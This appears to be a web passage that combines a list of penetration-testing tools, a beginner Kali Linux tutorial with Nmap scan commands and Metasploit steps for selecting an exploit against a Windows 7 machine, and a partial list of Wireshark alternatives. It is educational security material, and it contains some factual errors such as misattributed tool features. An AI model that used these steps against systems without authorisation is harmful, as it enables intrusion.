It can also be configured to run as a MITM proxy. The request intercepted could be sent to the request generator and then manual web application testing can be performed using variable parameters. It also has features to exploit the vulnerabilities that it finds.
W3af features
Proxy support
HTTP response cache
DNS cache
File uploading using multipart
Cookie handling
HTTP basic and digest authentication
User agent faking
Add custom headers to requests
9) Metaspoilt
This is the most popular and advanced Framework that can be used for pentest. It is an open source tool based on the concept of 'exploit' which means you pass a code that breach the security measures and enter a certain system. If entered, it runs a 'payload', a code that performs operations on a target machine, thus creating the perfect framework for penetration testing. It is a great testing tool test whether the IDS is successful in preventing the attacks that we bypass it
Metaspoilt can be used on networks, applications, servers, etc. It has a command line and GUI clickable interface, works on Apple Mac OS X, works on Linux and Microsoft Windows.
Features of Metaspoilt
Basic command line interface
Third party import
Manual brute forcing
Manual brute forcing
website penetration testing
10) Kali
Kali works only on Linux Machines. It enables you to create a backup and recovery schedule that fit your needs. It promotes a quick and easy way to find and update the largest database of security penetration testing collection to-date. It is the best tools available for packet sniffing and injecting. An expertise in TCP/IP protocol and networking can be beneficial while using this tool.
Features
Addition of 64 bit support allows brute force password cracking
Back Track comes with pre-loaded tools for LAN and WLAN sniffing, vulnerability scanning, password cracking, and digital forensics
Backtrack integrates with some best tools like Metaspoilt and Wireshark
Besides network tool, it also includes pidgin, xmms, Mozilla, k3b, etc.
Back track support KDE and Gnome.
11) Samurai framework:
The Samurai Web Testing Framework is a penetration testing software. It is supported on VirtualBox and VMWare that has been pre-configured to function as a web pen-testing environment.
Features:
It is open source, free to use tool
It contains the best of the open source and free tools that focus on testing and attacking website
It also includes a pre-configured wiki to set up the central information store during the pen-test
Download link: https://sourceforge.net/projects/samurai/files/
12) Aircrack:
Aircrack is one of the handy tool required in wireless pen testing. It cracks vulnerable wireless connections. It is powered by WEP WPA and WPA 2 encryption Keys.
Features:
More cards/drivers supported
Support all types of OS and platforms
New WEP attack: PTW
Support for WEP dictionary attack
Support for Fragmentation attack
Improved tracking speed
Download link: https://www.aircrack-ng.org/downloads.html
13) ZAP:
ZAP is one of the most popular open source security testing tool. It is maintained by hundreds of international volunteers. It can help users to find security vulnerabilities in web applications during the developing and testing phase.
Features:
It helps to Identifies the security holes present in the web application by simulating an actual attack
Passive scanning analyse the responses from the server to identify certain issues
It attempts brute force access to files and directories.
Spidering feature helps to construct the hierarchical structure of the website
Supplying invalid or unexpected data to crash it or to produce unexpected results
Helpful tool to find out the open ports on the target website
It provides an interactive Java shell which can be used to execute BeanShell scripts
It is fully internationalized and supports 11 languages
Download link: https://github.com/zaproxy/zaproxy/wiki
14) Sqlmap:
Sqlmap is an open source penetration testing tool. It automates the entire process of detecting and exploiting SQL injection flaws. It comes with many detection engines and features for an ideal penetration test.
Features:
Full support for six SQL injection techniques
Allows direct connection to the database without passing via a SQL injection
Support to enumerate users, password hashes, privileges, roles, databases, tables, and columns
Automatic recognition of password given in hash formats and support for cracking them
Support to dump database tables entirely or specific columns
The users can also select a range of characters from each column's entry
Allows to establish TCP connection between the affected system and the database server
Support to search for specific database names, tables or specific columns across all databases and tables
Allows to execute arbitrary commands and retrieve their standard output on the database server
Download link: https://github.com/sqlmapproject/sqlmap
15) Sqlninja:
Sqlninja is a penetration testing tool. It is aimed to exploit SQL Injection vulnerabilities on a web application. It uses Microsoft SQL Server as back-end. It also provides a remote access on the vulnerable DB server, even in a very hostile environment.
Features:
Fingerprinting of the remote SQL
Data extraction, time-based or using DNS tunnel
Allows Integration with Metasploit3, to obtain a graphical access to the remote DB server
Upload of executable using only normal HTTP requests via VBScript or debug.exe
Direct and reverse bindshell, both for TCP and UDP
Creation of a custom xp cmdshell if the original one is not available on w2k3 using token kidnapping
Download link: http://sqlninja.sourceforge.net/download.html
16) BeEF:
The Browser Exploitation Framework. It is a pen testing tool that focuses on the web browser. It uses GitHub to track issues and host its git repository.
Features:
It allows to check the actual security posture by using client-side attack vectors
BeEF allows to hook with one or more web browsers. It can then be used for launching directed command modules and further attacks on the system.
Download link: http://beefproject.com
17) Dradis:
Dradis is an open source framework for penetration testing. It allows maintaining the information that can be shared among the participants of a pen-test. The information collected helps users to understand what is completed and what needs to completed.
Features:
Easy process for report generation
Support for attachments
Seamless collaboration
Integration with existing systems and tools using server plugins
Platform independent
Download link: https://dradisframework.com/ce
18) Rapid 7:
Nexpose Rapid 7 is a useful vulnerability management software. It monitors exposures in real-time and adapts to new threats with fresh data which helps users to act at the moment of impact.
Features:
Get a Real-Time View of Risk
It brings innovative and progressive solutions that help the user to get their jobs done
Know Where to Focus
Bring More to Your Security Program
Download link: https://www.rapid7.com/products/nexpose/download/
19) Hping:
Hping is a TCP/IP packet analyzer pen testing tool. This interface is inspired to the ping (8) UNIX command. It supports TCP, ICMP, UDP, and RAW-IP protocols.
Features:
Allows firewall testing
Advanced port scanning
Network testing, using different protocols, TOS, fragmentation
Manual path MTU discovery
Advanced traceroute with all the supported protocols
Remote OS fingerprinting & uptime guessing
TCP/IP stacks auditing
Download link: https://github.com/antirez/hping
20) SuperScan:
Superscan is a free Windows-only closed-source penetration testing tool. It also includes networking tools such as ping, traceroute, whois and HTTP HEAD.
Feature:
Superior scanning speed
Support for unlimited IP ranges
Improved host detection using multiple ICMP methods
Provide support for TCP SYN scanning
Simple HTML report generation
Source port scanning
Extensive banner grabbing
Large built-in port list description database
IP and port scan order randomization
Extensive Windows host enumeration capability
Download link: https://www.mcafee.com/in/downloads/free-tools/termsofuse.aspx
21) ISS Scanner:
The IBM Internet Scanner is a pen testing tool which offers the foundation for the effective network security for any business.
Features:
Internet Scanner minimize the business risk by finding the weak spots in the network
It allows to automate scans and discover vulnerabilities
Internet Scanner cuts the risk by identifying the security holes, or vulnerabilities, in the network
Complete Vulnerability Management
Internet Scanner can identify more than 1,300 types of networked devices
Download link: https://www-01.ibm.com/software/info/trials
22) Scapy:
Scapy is a powerful and interactive pen testing tool. It can handle many classical tasks like scanning, probing, and attacks on the network.
Features:
It performs some specific tasks like sending invalid frames, injecting 802.11 frames. It uses various combining techniques which is hard to do with other tools
It allows user to build exactly the packets they want
Reduces the number of lines written to execute the specific code
Download link: http://secdev.org/projects/scapy/
23) IronWASP:
IronWASP is an open source software for web application vulnerability testing. It is designed to be customizable so that users can create their custom security scanners using it.
Features:
GUI based and very easy to use
It has powerful and an effective scanning engine
Support for recording Login sequence
Reporting in both HTML and RTF formats
Checks for over 25 types of web vulnerabilities
False Positives and Negatives detection support
It supports Python and Ruby
Extensible using plug-ins or modules in Python, Ruby, C# or VB.NET
Download link: http://ironwasp.org/download.html
24) Ettercap:
Ettercap is a comprehensive pen testing tool. It supports active and passive dissection. It also includes many features for network and host analysis.
Features:
It supports active and passive dissection of many protocols
Feature of ARP poisoning to sniff on a switched LAN between two hosts
Characters can be injected into a server or to a client while maintaining a live connection
Ettercap is capable of sniffing an SSH connection in full duplex
Allows sniffing of HTTP SSL secured data even when the connection is made using proxy
Allows creation of custom plugins using Ettercap's API
Download link: https://ettercap.github.io/ettercap/downloads.html
25) Security Onion:
Security Onion is a penetration testing tool. It is used for intrusion detection, and network security monitoring. It has an easy-to-use Setup wizard allows users to build an army of distributed sensors for their enterprise.
Features:
It is built on a distributed client-server model
Network Security Monitoring allows monitoring for security related events
It offers full packet capture
Network-based and host-based intrusion detection systems
It has a built-in mechanism to purge old data before storage device fill to its capacity
Download link: https://securityonion.net/
26) Personal Software Inspector:
Personal Software Inspector is an open source computer security solution. This tool can identify vulnerabilities in applications on a PC or a Server.
Features:
It is available in eight different languages
Automates the updates for insecure programs
It covers thousands of programs and automatically detects insecure programs
This pen testing tool automatically and regularly scans PC for vulnerable programs
Detects and notifies programs that can't be automatically updated
Download link: http://learn.flexerasoftware.com/SVM-EVAL-Personal-Software-Inspector
27) HconSTF:
HconSTF is Open Source Penetration Testing tool based on different browser technologies. It helps any security professional to assists in the Penetration testing. It contains web tools which are powerful in doing XSS, SQL injection, CSRF, Trace XSS, RFI, LFI, etc.
Features:
Categorized and comprehensive toolset
Every option is configured for penetration testing
Specially configured and enhanced for gaining solid anonymity
Works for web app testing assessments
Easy to use & collaborative Operating System
Download link: http://www.hcon.in/
28) IBM Security AppScan:
IBM Security AppScan helps to enhance web application security and mobile application security. It improves application security and strengthens regulatory compliance. It helps users to identify security vulnerabilities and generate reports.
Features:
Enable Development and QA to perform testing during SDLC process
Control what applications each user can test
Easily distribute reports
Increase visibility and better understand enterprise risks
Focus on finding and fixing issues
Control the access of information
Download link: http://www-03.ibm.com/software/products/en/appscan
29) Arachni:
Arachni is an open source Ruby framework based tool for penetration testers & administrators. It is used for evaluating the security of modern web applications.
Features:
It is a versatile tool, so it covers large numbers of use-cases. This ranging from a simple command line scanner utility to a global high-performance grid of scanners
Option for Multiple deployments
It offers verifiable, inspectable code base to ensure the highest level of protection
It can easily integrate with browser environment
It offers highly detailed and well-structured reports
Download link: https://sourceforge.net/projects/safe3wvs/files
30) Websecurify:
Websecurify is a powerful security testing environment. It is a user -friendly interface which is simple and easy to use. It offers a combination of automatic and manual vulnerability testing technologies.
Features:
Good testing and scanning technology
Strong testing engine to detect URLs
It is extensible with many available add-ons
It is available for all the major desktop and mobile platforms
Download link: https://www.websecurify.com/
31) Vega:
Vega is an open source web security scanner and pen testing platform to test the security of web applications.
Features:
Automated, Manual, and Hybrid Security Testing
It helps users to find vulnerabilities. It may be cross-site scripting, stored cross-site scripting, blind SQL injection, shell injection, etc.
It can automatically log into websites when supplied with user credentials
It runs effectively on Linux, OS X, and Windows
Vega detection modules are written in JavaScript
Download link: https://subgraph.com/vega/download/index.en.html
32) Wapiti:
Wapiti is another famous penetration testing tool. It allows auditing the security of the web applications. It supports both GET and POST HTTP methods for the vulnerability check.
Features:
Generates vulnerability reports in various formats
It can suspend and resume a scan or an attack
Fast and easy way to activate and deactivate attack modules
Support HTTP and HTTPS proxies
It allows restraining the scope of the scan
Automatic removal of a parameter in URLs
Import of cookies
It can activate or deactivate SSL certificates verification
Extract URLs from Flash SWF files
Download link: https://sourceforge.net/projects/wapiti/files/
33) Kismet:
Kismet is a wireless network detector and intrusion detection system. It works with Wi-Fi networks but can be expanded via plugins as it allows to handle other network types.
Features:
Allows standard PCAP logging
Client/Server modular architecture
Plug-in architecture to expand core features
Multiple capture source support
Distributed remote sniffing via light-weight remote capture
XML output for integration with other tools
Download link: https://www.kismetwireless.net/download.shtml
34) Kali Linux:
Kali Linux is an open source pen testing tool which is maintained and funded by Offensive Security.
Features:
Full customization of Kali ISOs with live-build to create customized Kali Linux images
It contains a bunch of Meta package collections which aggregate different tool sets
ISO of Doom and Other Kali Recipes
Disk Encryption on Raspberry Pi 2
Live USB with Multiple Persistence Stores
Download link: https://www.kali.org/
35) Parrot Security:
Parrot Security is a pen testing tool. It offers fully portable laboratory for security and digital forensics experts. It also helps users to protect their privacy with anonymity and crypto tools.
Features:
It includes a full arsenal of security oriented tools to perform penetration tests, security audits and more.
It comes with preinstalled and useful and updated libraries
Offers powerful worldwide mirror servers
Allows community-driven development
Offers separate Cloud OS specifically designed for servers
Download link: https://www.parrotsec.org/download.fx
36) OpenSSL:
This toolkit is licensed under an Apache-style license. It is free and open source project that provides a full-featured toolkit for the TLS and SSL protocols.
Features:
It is written in C, but wrappers are available for many computer languages
The library includes tools for generating RSA private keys and Certificate Signing Requests
Verify CSR file
Completely remove Passphrase from Key
Create new Private Key and allows Certificate Signing Request
Download link: https://www.openssl.org/source/
37) Snort:
Snort is an open-source intrusion detection and pen testing system. It offers the benefits of signature-protocol- and anomaly-based inspection methods. This tool helps users to get maximum protection from malware attacks.
Features:
Snort gained notoriety for being able to detect threats accurately at high speeds
Protect your workspace from emerging attacks quickly
Snort can be used to create customized unique network security solutions
Test SSL certificate of a particular URL
It can check if particular cipher is accepted on URL
Verify the Certificate Signer Authority
Ability to submit false positives/negatives
Download link: https://www.snort.org/downloads
38) Backbox:
BackBox is an Open Source Community project with the objective of enhancing the culture of security in IT environment. It is available in two different variations like Backbox Linux and Backbox Cloud. It includes some of the most commonly known/used security and analysis tools.
Features:
It is helpful tool to reduce company resource needs and lower costs of managing multiple network device requirements
It is fully automated pen testing tool. So, no agents and no network configuration needed to make changes. In order to perform scheduled automated configuration
Secure Access to Devices
Organizations can save time as there is no need to track individual network devices
Supports Credential and Configuration File Encryption
Self-Backup and Automatic Remote Storage
Offers IP Based Access Control
No need to write command as it comes with pre-Configured Commands
Download link: https://backbox.org/download
39) THC Hydra:
Hydra is a parallelized login cracker and pen testing tool. It is very fast and flexible, and new modules are easy to add. This tool allows researchers and security consultants to find unauthorized access.
Features:
Full time-memory trade-off tool suites along with rainbow table generation, sort, conversion and look up
It supports rainbow table of any hash algorithm
Support rainbow table of any charset
Support rainbow table in compact or raw file format
Computation on multi-core processor support
Runs on Windows and Linux operating systems
Unified rainbow table file format on all supported OS
Support GUI and Command line user interface
Download link: https://github.com/vanhauser-thc/thc-hydra
40) Reputation Monitor Alert:
Open Threat Exchange Reputation Monitor is a free service. It allows professionals to track their organization's reputation. With the help of this tool, businesses and organizations can track the public IP and domain reputation of their assets.
Features:
Monitors cloud, hybrid cloud, and on-premises infrastructure
Delivers continuous threat intelligence to keep update about threats as they emerge
Provides most comprehensive threat detection and actionable incident response directives
Deploys quickly, easily, and with less number of efforts
Reduces TCO over traditional security solutions
Download link: https://www.alienvault.com/try-it-free?utm_internal=sb_freetrial_modal
41) John the Ripper:
John the Ripper known as JTR is a very popular password cracking tool. It is primarily used to perform dictionary attacks. It helps identify weak password vulnerabilities in a network. It also supports users from brute force and rainbow crack attacks.
Features:
John the Ripper is free and Open Source software
Proactive password strength checking module
It allows online browsing of the documentation
Support for many additional hash and cipher types
Allows to browse the documentation online including summary of changes between two versions
Download link: http://www.openwall.com/john/
42) Safe3 scanner:
Safe3WVS is one of the most powerful web vulnerability testing tool. It comes with web spider crawling technology, especially web portals. It is the fastest tool to find issues like SQL injection, upload vulnerability, and more.
Features:
Full support for Basic, Digest and HTTP authentications.
Intelligent web spider automatic removes repeated web pages
An automatic JavaScript analyzer provide support for extracting URLs from Ajax, Web 2.0 and any other applications
Support to scan SQL injection, upload vulnerability, admin path and directory list vulnerability
Download link: https://sourceforge.net/projects/safe3wvs/files/latest/download
43) CloudFlare:
CloudFlare is CDN with robust security features. Online threats range from comment spam and excessive bot crawling to malicious attacks like SQL injection. It provides protection against comment spam, excessive bot crawling, and malicious attacks.
Feature:
It is an enterprise-class DDoS protection network
Web application firewall helps from the collective intelligence of the entire network
Registering domain using CloudFlare is the most secure way to protect from domain hijacking
Rate Limiting feature protects user's critical resources. It blocks visitors with suspicious number of request rates.
CloudFlare Orbit solves security issues for IOT devices
Download link: https://www.cloudflare.com/
44) Zenmap
Zenmap is the official Nmap Security Scanner software. It is a multi-platform free and open source application. It is easy to use for beginners but also offers advanced features for experienced users.
Features:
Interactive and graphical results viewing
It summarizes details about a single host or a complete scan in a convenient display.
It can even draw a topology map of discovered networks.
It can show the differences between two scans.
It allows administrators to track new hosts or services appearing on their networks. Or track existing services that go down
Download link: https://nmap.org/download.html
The other tools that might be useful for penetration testing are
Acunetix: It is a web vulnerability scanner targeted at web applications. It is expensive tool compare to others and provides facility like cross site scripting testing, PCI compliance reports, SQL injection, etc.
Retina: It is more like a vulnerability management tools than a pre-testing tool
Nessus: It concentrates in compliance checks, sensitive data searches, IPs scan, website scanning, etc.
Netsparker: This tool comes with a robust web application scanner that identifies vulnerabilities and suggest solutions. There are free limited trials available but most of the time it is a commercial product. It also helps to exploit SQL injection and LFI (Local File Induction)
CORE Impact: This software can be used for mobile device penetration, password identification and cracking, network devise penetration etc. It is one of the expensive tools in software testing
Burpsuite: Like other this software is also a commercial product. It works on by intercepting proxy, web application scanning, crawling content and functionality etc. The advantage of using Burpsuite is that you can use this on windows, Linux and Mac OS X environment.
Kali Linux Tutorial: What is, Install, Utilize Metasploit and Nmap
What is Kali Linux?
Kali Linux is a Security Distribution of Linux specifically designed for digital forensics and penetration testing. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack. BackTrack was their previous information security Operating System. The first iteration of Kali Linux was Kali 1.0.0 was introduced in March 2013. Offensive Security currently funds and supports Kalin Linux. If you were to visit Kali's website today (www.kali.org), you would see a large banner stating, "Our Most Advanced Penetration Testing Distribution, Ever." A very bold statement that ironically has yet to be disproven.
Kali Linux has over 600 preinstalled penetration-testing applications to discover. Each program with its unique flexibility and use case. Kali Linux does excellent job separating these useful utilities into the following categories:
Information Gathering
Vulnerability Analysis
Wireless Attacks
Web Applications
Exploitation Tools
Stress Testing
Forensics Tools
Sniffing & Spoofing
Password Attacks
Maintaining Access
Reverse Engineering
Reporting Tools
Hardware Hacking
In this beginners tutorial, you will learn:
Who uses Kali Linux and Why?
Kali Linux is truly a unique operating system, as its one of the few platforms openly used by both good guys and bad guys. Security Administrators, and Black Hat Hackers both use this operating system extensively. One to detect and prevent security breaches, and the other to identify and possibly exploit security breaches. The number of tools configured and preinstalled on the operating system, make Kali Linux the Swiss Army knife in any security professionals toolbox.
Professionals that use Kali Linux
Security Administrators – Security Administrators are responsible for safeguarding their institution's information and data. They use Kali Linux to review their environment(s) and ensure there are no easily discoverable vulnerabilities.
Network Administrators – Network Administrators are responsible for maintaining an efficient and secure network. They use Kali Linux to audit their network. For example, Kali Linux has the ability to detect rogue access points.
Network Architects – Network Architects, are responsible for designing secure network environments. They utilize Kali Linux to audit their initial designs and ensure nothing was overlooked or misconfigured.
Pen Testers – Pen Testers, utilize Kali Linux to audit environments and perform reconnaissance on corporate environments which they have been hired to review.
CISO – CISO or Chief Information Security Officers, use Kali Linux to internally audit their environment and discover if any new applications or rouge configurations have been put in place.
Forensic Engineers – Kali Linux posses a "Forensic Mode", which allows a Forensic Engineer to perform data discovery and recovery in some instances.
White Hat Hackers – White Hat Hackers, similar to Pen Testers use Kali Linux to audit and discover vulnerabilities which may be present in an environment.
Black Hat Hackers – Black Hat Hackers, utilize Kali Linux to discover and exploit vulnerabilities. Kali Linux also has numerous social engineer applications, which can be utilized by a Black Hat Hacker to compromise an organization or individual.
Grey Hat Hackers – Grey Hat Hackers, lie in between White Hat and Black Hat Hackers. They will utilize Kali Linux in the same methods as the two listed above.
Computer Enthusiast – Computer Enthusiast is a pretty generic term, but anyone interested in learning more about networking or computers, in general, can use Kali Linux to learn more about Information Technology, networking, and common vulnerabilities.
Kali Linux Installation Methods
Kali Linux can be installed using the following methods:
Ways to Run Kali Linux:
Directly on a PC, Laptop – Utilizing a Kali ISO image, Kali Linux can be installed directly onto a PC or Laptop. This method is best if you have a spare PC and are familiar with Kali Linux. Also, if you plan or doing any access point testing, installing Kali Linux directly onto Wi-Fi enabled laptop is recommended.
Virtualized (VMware, Hyper-V, Oracle VirtualBox, Citrix) – Kali Linux supports most known hypervisors and can be easily into the most popular ones. Pre-configured images are available for download from www.kali.org, or an ISO can be used to install the operating system into the preferred hypervisor manually.
Cloud (Amazon AWS, Microsoft Azure) – Given the popularity of Kali Linux, both AWS and Azure provide images for Kali Linux.
USB Boot Disc – Utilizing Kali Linux's ISO, a boot disc can be created to either run Kali Linux on a machine without actually installing it or for Forensic purposes.
Windows 10 (App) – Kali Linux can now natively run on Windows 10, via the Command Line. Not all features work yet as this is still in beta mode.
Mac (Dual or Single boot) – Kali Linux can be installed on Mac, as a secondary operating system or as the primary. Parallels or Mac's boot functionality can be utilized to configure this setup.
Install Kali Linux using Virtual Box
The easiest method and arguably the most widely used is installing Kali Linux and running it from Oracle's VirtualBox.
This method allows you to continue to use your existing hardware while experimenting with the featured enriched Kali Linux in a completely isolated environment. Best of all everything is free. Both Kali Linux and Oracle VirtualBox are free to use. This tutorial assumes you have already installed Oracle's VirtualBox on your system and have enabled 64-bit Virtualization via the Bios.
Step 1) Go to https://images.offensive-security.com/virtual-images/kali-linux-2019.2-vbox-amd64.ova
This will download an OVA image, which can be imported into VirtualBox
Step 2) Open the Oracle VirtualBox Application, and from the File, Menu select Import Appliance
File Menu -> Import Appliance
Step 3) On the following screen "Appliance to Import" Browse to the location of the downloaded OVA file and click Open
Step 4) Once you click Open, you will be taken back to the "Appliance to Import" simply click Next
Step 5) The following screen "Appliance Settings" displays a summary of the systems settings, leaving the default settings is fine. As shown in the screenshot below, make a note of where the Virtual Machine is located and then click Import.
Step 6) VirtualBox will now Import the Kali Linux OVA appliance. This process could take anywhere from 5 to 10 minutes to complete.
Step 7) Congratulations, Kali Linux has been successfully installed on VirtualBox. You should now see the Kali Linux VM in the VirtualBox Console. Next, we'll take a look at Kali Linux and some initial steps to perform.
Step 8) Click on the Kali Linux VM within the VirtualBox Dashboard and click Start, this will boot up the Kali Linux Operating System.
Step 9) On the login screen, enter "Root" as the username and click Next.
Step 10) As mentioned earlier, enter "toor" as the password and click SignIn.
You will now be present with the Kali Linux GUI Desktop. Congratulations you have successfully logged into Kali Linux.
Getting Started with Kali Linux GUI
The Kali Desktop has a few tabs you should initially make a note of and become familiar with. Applications Tab, Places Tab, and the Kali Linux Dock.
Applications Tab – Provides a Graphical Dropdown List of all the applications and tools pre-installed on Kali Linux. Reviewing the Applications Tab is a great way to become familiar with the featured enriched Kali Linux Operating System. Two applications we'll discuss in this tutorial are Nmap and Metasploit. The applications are placed into different categories which makes searching for an application much easier.
Accessing Applications
Step 1) Click on Applications Tab
Step 2) Browse to the particular category you're interested in exploring
Step 3) Click on the Application you would like to start.
Places Tab – Similar to any other GUI Operating System, such as Windows or Mac, easy access to your Folders, Pictures and My Documents is an essential component. Places on Kali Linux provides that accessibility that is vital to any Operating System. By default, the Places menu has the following tabs, Home, Desktop, Documents, Downloads, Music, Pictures, Videos, Computer and Browse Network.
Accessing Places
Step 1) Click on the Places Tab
Step 2) Select the location you would like to access.
Kali Linux Dock – Similar to Apple Mac's Dock or Microsoft Windows Task Bar, the Kali Linux Dock provides quick access to frequently used / favorite applications. Applications can be added or removed easily.
To Remove an Item from the Dock
Step 1) Right-Click on the Dock Item
Step 2) Select Remove From Favorites
To Add Item to Dock
Adding an item to the Dock is very similar to removing an item from the Dock
Step 1) Click on the Show Applications button at the bottom of the Dock
Step 2) Right Click on Application
Step 3) Select Add to Favorites
Once completed the item will be displayed within the Dock
Kali Linux has many other unique features, which makes this Operating System the primary choice by Security Engineers and Hackers alike. Unfortunately, covering them all is not possible within this tutorial; however, you should feel free to explore the different buttons displayed on the desktop.
What is Nmap?
Network Mapper, better known as Nmap for short is a free, open-source utility used for network discovery and vulnerability scanning. Security professionals use Nmap to discover devices running in their environments. Nmap also can reveal the services, and ports each host is serving, exposing a potential security risk. At the most basic level, consider Nmap, ping on steroids. The more advanced your technical skills evolve the more usefulness you'll find from Nmap
Nmap offers the flexibility to monitor a single host or a vast network consisting of hundreds if not thousands of devices and subnets. The flexibility Nmap offers has evolved over the years, but at its core, it's a port-scanning tool, which gathers information by sending raw packets to a host system. Nmap then listens for responses and determines if a port is open, closed or filtered.
The first scan you should be familiar with is the basic Nmap scan that scans the first 1000 TCP ports. If it discovers a port listening it will display the port as open, closed, or filtered. Filtered meaning a firewall is most likely in place modifying the traffic on that particular port. Below is a list of Nmap commands which can be used to run the default scan.
Nmap Target Selection
How to Perform a Basic Nmap Scan on Kali Linux
To run a basic Nmap scan in Kali Linux, follow the steps below. With Nmap as depicted above, you have the ability to scan a single IP, a DNS name, a range of IP addresses, Subnets, and even scan from text files. For this example, we will scan the localhost IP address.
Step 1) From the Dock menu, click on the second tab which is the Terminal
Step 2) The Terminal window should open, enter the command ifconfig, this command will return the local IP address of your Kali Linux system. In this example, the local IP address is 10.0.2.15
Step 3) Make a note of the local IP Address
Step 4) In the same terminal window, enter nmap 10.0.2.15, this will scan the first 1000 ports on the localhost. Considering this is the base install no ports should be open.
Step 5) Review results
By default, nmap only scans the first 1000 ports. If you needed to scan the complete 65535 ports, you would simply modify the above command to include -p-.
Nmap 10.0.2.15 -p-
Nmap OS Scan
Another basic but useful feature of nmap is the ability to detect the OS of the host system. Kali Linux by default is secure, so for this example, the host system, which Oracle's VirtualBox is installed on, will be used as an example. The host system is a Windows 10 Surface. The host system's IP address is 10.28.2.26.
In the Terminal window enter the following nmap command:
nmap 10.28.2.26 – A
Review results
Adding -A tells nmap to not only perform a port scan but also try to detect the Operating System.
Nmap is a vital utility in any Security Professional toolbox. Use the command nmap -h to explore more options and commands on Nmap.
What is Metasploit?
The Metasploit Framework is an open source project that provides a public resource for researching vulnerabilities and developing code that allows security professionals the ability to infiltrate their own network and identify security risk and vulnerabilities. Metasploit was recently purchased by Rapid 7 (https://www.metasploit.com). However, the community edition of Metasploit is still available on Kali Linux. Metasploit is by far the world's most used Penetration utility.
It is important that you are careful when using Metasploit because scanning a network or environment that is not yours could be considered illegal in some instances. In this tutorial, we'll show you how to start Metasploit and run a basic scan on Kali Linux. Metasploit is considered an advance utility and will require some time to become adept, but once familiar with the application it will be an invaluable resource.
Metasploit and Nmap
Within Metasploit, we can actually utilize Nmap. In this case, you'll learn how to scan your local VirtualBox subnet from Metasploit using the Nmap utility we just learned about.
Step 1) On the Applications Tab, scroll down to 08-Exploitation Tools and then select Metasploit
Step 2) A terminal box will open, with MSF in the dialog, this is Metasploit
Step 3) Enter the following command
db_nmap -V -sV 10.0.2.15/24
(be sure to replace 10.0.2.15 with your local IP address)
Here:
db_ stands for database
-V Stands for verbose mode
-sV stands for service version detection
Metasploit Exploit Utility
Metasploit very robust with its features and flexibility. One common use for Metasploit is the Exploitation of Vulnerabilities. Below we'll go through the steps of reviewing some exploits and trying to exploit a Windows 7 Machine.
Step 1) Assuming Metasploit is still open enter Hosts -R in the terminal window. This adds the hosts recently discovered to Metasploit database.
Step 2) Enter "show exploits", this command will provide a comprehensive look at all the exploits available to Metasploit.
Step 3) Now, try to narrow down the list with this command: search name: Windows 7, this command searches the exploits which specifically include windows 7, for the purpose of this example we will try to exploit a Windows 7 Machine. Depending on your environment, you will have to change the search parameters to meet your criteria. For example, if you have Mac or another Linux machine, you will have to change the search parameter to match that machine type.
Step 4) For the purposes of this tutorial we will use an Apple Itunes vulnerability discovered in the list. To utilize the exploit, we must enter the complete path which is displayed in the list: use exploit/windows/browse/apple_itunes_playlist
Step 5) If the exploit is successful the command prompt will change to display the exploit name followed by > as depicted in the below screenshot.
Step 6) Enter show options to review what options are available to the exploit. Each exploit will, of course, have different options.
Summary
In sum, Kali Linux is an amazing operating system that is widely used by various professionals from Security Administrators, to Black Hat Hackers. Given its robust utilities, stability, and ease of use, it's an operating system everyone in the IT industry and computer enthusiast should be familiar with. Utilizing just the two applications discussed in this tutorial will significantly aid a firm in securing their Information Technology infrastructure. Both Nmap and Metasploit are available on other platforms, but their ease of use and pre-installed configuration on Kali Linux makes Kali the operating system of choice when evaluating and testing the security of a network. As stated previously, be careful using the Kali Linux, as it should only be used in network environments which you control and or have permission to test. As some utilities, may actually cause damage or loss of data.
11 Best Wireshark Alternatives in 2020
Wireshark is a widely used network monitoring and WiFi troubleshooting tool. However, with Wireshark tool is that you can only gather information from the network but cannot send this information.
Here, is a curated list of top 11 tools which are capable of replacing Wireshark. This list includes commercial as well as open-source tools with popular features and latest download link.
1) Cloud Shark
A web-based platform which allows you to view analyze, and share packet capture files in a browser. It helps you to solve network problems faster with packet captures.
Features:
Drag and drop capture right into your browser, or upload using your API key
Cloud Shark can act like a drop-box for the files you generate
Allows readers to access advanced analysis from any device without any special software
You can instantly link your work to share with co-workers or customers
Download link: https://www.cloudshark.org/
2) Sysdig
Sysdig is an open source tool to monitor and secure containers both for windows and mac. It comes with a command line interface which allows the user to track the system acidity in real time.
Features:
The tool support application tracking
Helps you to enhance software reliability and bring an ideal resolution
Accelerate your transition to containers
Allows you to protect and assure you're critical applications
Download link: https://sysdig.com/pricing/
3) Mojo Packets
Mojo Packets is yet another Wireshark alternative. This is an ideal tool for cloud-based WiFi analysis and troubleshooting tool.
Features:
Helps you to store and organize your traces in Packets for quick access
Allows you to capture packet traces at any remote site
Visualization of WiFi connections and visual coding
Tag particular parts of a trace with notes and share them for collaborative troubleshooting
Download Link: https://mojopackets.com/
4) Colasoft
Colasoft nChronos is a Network Performance Analysis Solution. It allows IT professionals to collect and save the high amount of packet-level network data. This data allows the user to navigate time specific periods of the data.
Features:
Allows you to monitor your network and application performance in real-time
Analyze and troubleshoot all types of abnormalities in your system
Save IT cost and enhance the customer experience
Download link: https://www.colasoft.com/download/index.php
5) Debookee
Debookee is a network monitoring tool which allows you to the intercept and motor the traffic of any device in the same subnet. You can capture data from the mobile device on your Mac, Printer, Tv, without the need of any proxy.
Features:
Allows users to see what is happing on their work
Helps you to find out who is using your WIFI bandwidth
Scan your LAN or any IP range and helps you to find all the connected devices
Display all Wi-Fi clients covers in the radio range and to which API they're associated
Download link: https://debookee.com/
6) Omnipeek
Omnipeek is the best tool for network analytics and performance diagnostics. It offers advanced capabilities for security investigations. The tool helps to compare, discover, and reduce your mean-time-to-resolution(MTTR).
Features:
You can scan packets for signs of trouble or detect changes in transfer speeds
The traffic analyzing feature can report on end-to-end performance for connections
Added support for 3rd party authentication
Download link: https://www.savvius.com/product/omnipeek/
7) Ettercap
Ettercap is a comprehensive network monitor tool. It also supports both active and passive dissection of different protocols. It also includes features for network and host analysis.
Features:
SSH3 and SSL support
Packet filtering/dropping
Remote traffic sniffing with the help of tunnels and route mangling
Passive OS fingerprint
Allows you to kill the connection
Download link: http://www.ettercap-project.org/downloads.html
8) SmartSniff
SmartSniff is a network monitoring alternative tool for Wireshark. It allows you to captured data in conversation-like sequence between servers and clients.
Features:
Helps you to capture TCP/IP packets on the network without installing a capture driver
Allows you to capture driver of Microsoft Network Monitor
Smartsniff helps you to capture data from other unsecured wireless networks
Download link: http://www.nirsoft.net/utils/smsniff.html
9) EtherApe
